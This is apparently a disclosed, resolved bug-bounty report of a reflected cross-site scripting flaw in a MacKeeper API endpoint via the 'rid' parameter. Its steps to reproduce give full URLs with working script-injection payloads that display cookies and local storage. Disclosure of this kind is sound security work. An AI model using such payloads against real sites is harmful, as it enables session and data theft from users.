rxss at https://mackeeper.com page not found via rid parameter
Team Summary
Official summary from Clario
### Summary Reflected xss at `/mk/api/send-event` with rid parameter. Vuln endpoint: `https://mackeeper.com/mk/api/send-event?rid=<PAYLOAD>` payload: `</script><script>alert(test)</script>` ### Steps To Reproduce go to `https://mackeeper.com/mk/api/send-event?rid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E payload: </script><script>alert(document.cookie))</script>` go to `https://mackeeper.com/mk/api/send-event?rid=%3C/script%3E%3Cscript%3Ealert(JSON.stringify(localStorage))%3C/script%3E payload : </script><script>alert(JSON.stringify(localStorage))</script>`
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected